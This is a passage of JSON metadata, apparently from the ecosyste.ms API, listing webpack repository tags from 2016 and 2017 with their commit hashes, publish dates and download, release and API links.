v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.0/manifests"},{"name":"v2.4.1","sha":"bd753567da1248624beaaea14af31d6dbe303411","kind":"tag","published_at":"2017-04-14T13:34:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"0cbd8fd1a05ee401b5feb95ba2b8edae31571d94","kind":"tag","published_at":"2017-04-14T11:42:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.0/manifests"},{"name":"v1.15.0","sha":"d4878a55be7a4b7ac4e5db1ae5eef89e15811072","kind":"tag","published_at":"2017-04-13T10:18:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.15.0/manifests"},{"name":"v2.3.3","sha":"ba24c1b163dc038ed738eb4a57dcb241bf63146d","kind":"tag","published_at":"2017-04-03T07:49:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"6b209b13d76ec43080d6afbad4bb4dd6931e4638","kind":"tag","published_at":"2017-03-25T00:02:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.2/manifests"},{"name":"v2.3.1","sha":"4b9b660e8c4fe8ab6425014cb24dcec2d5df194b","kind":"tag","published_at":"2017-03-22T14:40:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"46dc08e6317170a56df6c34adc8133dd6f70f1fa","kind":"tag","published_at":"2017-03-21T22:43:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.0/manifests"},{"name":"v2.2.1","sha":"0445b156d2c958536b72036e68ca6bde0ad32055","kind":"tag","published_at":"2017-01-30T21:13:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"4be093d27942c25ec802a40268ed94e24d886b1d","kind":"tag","published_at":"2017-01-17T19:14:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0/manifests"},{"name":"v2.2.0-rc.8","sha":"227846990cbc1a406bb61c5e6cafb3f3f38c8cdd","kind":"tag","published_at":"2017-01-17T18:46:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.8","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.8/manifests"},{"name":"v2.2.0-rc.7","sha":"0b476022bbbddb206432e20b9c8bc5e91e592202","kind":"tag","published_at":"2017-01-16T15:01:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.7","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.7/manifests"},{"name":"v2.2.0-rc.6","sha":"97966969b0c9e8425ecb1238deea979c6a18cb27","kind":"tag","published_at":"2017-01-16T02:48:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.6","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.6/manifests"},{"name":"v2.2.0-rc.5","sha":"437dce4c8684f4295b5bb68a6ea5662c2660d780","kind":"tag","published_at":"2017-01-15T16:23:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.5","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.5/manifests"},{"name":"v2.2.0-rc.4","sha":"f745f02910cb45a55ed659ebd99288e45a38e873","kind":"tag","published_at":"2017-01-11T15:42:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.4","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.4/manifests"},{"name":"v2.2.0-rc.3","sha":"92a8be23614f92bc5669bf43eb0ddf746b2477e7","kind":"tag","published_at":"2016-12-28T15:03:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.3/manifests"},{"name":"v2.2.0-rc.2","sha":"8369cc4c03767d7a76d1f7a047d11e71a550ddae","kind":"tag","published_at":"2016-12-22T10:51:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.2/manifests"},{"name":"v2.2.0-rc.1","sha":"27e604e23100274a8887a5acf0008376d2617071","kind":"tag","published_at":"2016-12-17T08:09:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.1/manifests"},{"name":"v2.2.0-rc.0","sha":"057814be1930cc4e8cee22c271823ea821ad067f","kind":"tag","published_at":"2016-12-14T21:32:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.0/manifests"},{"name":"v2.1.0-beta.28","sha":"2e2eac70ab1ba648ef663b9b93fdedd7928672c4","kind":"tag","published_at":"2016-12-13T07:58:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.28","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.28/manifests"},{"name":"v1.14.0","sha":"e666686d9029753c243db5880de44aba57151d76","kind":"tag","published_at":"2016-12-07T08:06:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.14.0/manifests"},{"name":"v2.1.0-beta.27","sha":"adaca2578cc3dcffbb2d0b639cb611a53f6da7c9","kind":"tag","published_at":"2016-11-15T19:00:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.27","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.27/manifests"},{"name":"v2.1.0-beta.26","sha":"afbdff48ef2d5b304a41e72f4df8d51d629bc96f","kind":"tag","published_at":"2016-11-14T00:07:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.26","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.26/manifests"},{"name":"v1.13.3","sha":"1a5fd7e8caeef794f67e56d9d734998209b0838c","kind":"commit","published_at":"2016-10-26T14:21:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.3/manifests"},{"name":"v2.1.0-beta.25","sha":"3029e5b1b1c486d7b3dd51e753d20bc25ceecd83","kind":"tag","published_at":"2016-09-21T18:31:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.25","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.25/manifests"},{"name":"v2.1.0-beta.24","sha":"1c4597f1380ff6e5c7bf2f70c997d7ff52773f5b","kind":"tag","published_at":"2016-09-20T19:13:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.24","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.24/manifests"},{"name":"v2.1.0-beta.23","sha":"8292d2f6597925d6d37fd78b91f0b5cd3798a362","kind":"tag","published_at":"2016-09-19T23:02:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.23","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.23/manifests"},{"name":"v2.1.0-beta.22","sha":"f5d9a0901cb6b0cca8dcdbb5cd5a2d21de03fde1","kind":"tag","published_at":"2016-09-07T10:43:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.22","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.22/manifests"},{"name":"v1.13.2","sha":"4b20545b375da82aa6418e6d498f01d543110af0","kind":"tag","published_at":"2016-08-18T08:31:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.2/manifests"},{"name":"v2.1.0-beta.21","sha":"c7cb6cb9d0d55b9f9185a8e9db02dcf97ac1c0de","kind":"tag","published_at":"2016-08-17T21:23:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.21","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.21/manifests"},{"name":"v2.1.0-beta.20","sha":"b3a3ef3d4545fd1ae5e6abd678de96d4ebfcc5de","kind":"tag","published_at":"2016-07-20T22:41:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.20","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.20/manifests"},{"name":"v2.1.0-beta.19","sha":"21a72529fa6af47185dc14f86b8d8de6dbcb6565","kind":"tag","published_at":"2016-07-17T22:49:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.19","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.19/manifests"},{"name":"v2.1.0-beta.18","sha":"d826f99e342f7c0ae223a6837d98d2f648780a09","kind":"tag","published_at":"2016-07-15T21:26:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.18","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.18/manifests"},{"name":"v2.1.0-beta.17","sha":"bc29455e92f4b760db745775a4fca5cde0d01d23","kind":"tag","published_at":"2016-07-13T12:04:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.17","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.17/manifests"},{"name":"v2.1.0-beta.16","sha":"90d537ef4ce1092f76bd02ee2a75838c67b809fc","kind":"tag","published_at":"2016-07-13T09:11:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.16","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.16/manifests"},{"name":"v2.1.0-beta.15","sha":"2829516da95a3bb2fe7dde76013f80f0f7e22dbb","kind":"tag","published_at":"2016-06-28T23:23:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.15","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.15/manifests"},{"name":"v2.1.0-beta.14","sha":"6748dca837b6402f056b6ac94ffc3c99f8a25c36","kind":"tag","published_at":"2016-06-24T00:02:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.14","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.14/manifests"},{"name":"v2.1.0-beta.13","sha":"36e4fd2348381d578c43abcbd15ef39a78b5bc07","kind":"tag","published_at":"2016-06-07T22:25:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.13","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.13/manifests"},{"name":"v2.1.0-beta.12","sha":"3580ec93f8ac7b999fc2faa4bccad31fe6ae5331","kind":"tag","published_at":"2016-06-05T21:02:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.12","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.12/manifests"},{"name":"v2.1.0-beta.11","sha":"0b1f08022681be796612542c7d0d3c736564a4ff","kind":"tag","published_at":"2016-06-05T18:52:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.11","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.11/manifests"},{"name":"v2.1.0-beta.10","sha":"2343af44bb4314bafc1ba29cd019bc4b28edbcbf","kind":"tag","published_at":"2016-06-05T18:19:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.10","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.10/manifests"},{"name":"v2.1.0-beta.9","sha":"dc3bd055027d8d1ebbb0ebdd07fb73387a0ab6d1","kind":"tag","published_at":"2016-06-04T18:19:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.9","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.9/manifests"},{"name":"v2.1.0-beta.8","sha":"abf0cefd592700a19856c3ef9b6d65f905ec73c1","kind":"tag","published_at":"2016-05-29T18:53:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.8","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.8/manifests"},{"name":"v1.13.1","sha":"01ea02a95cf8c446fd1dc9e82fae0febe9332034","kind":"tag","published_at":"2016-05-20T06:48:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.1/manifests"},{"name":"v2.1.0-beta.7","sha":"9162f9e6eea62137139f95b8aaedee335c870edd","kind":"tag","published_at":"2016-05-06T22:00:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.7","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.7/manifests"},{"name":"v2.1.0-beta.6","sha":"ca8b693c2c17bd06778476381fae23b3b21c0475","kind":"tag","published_at":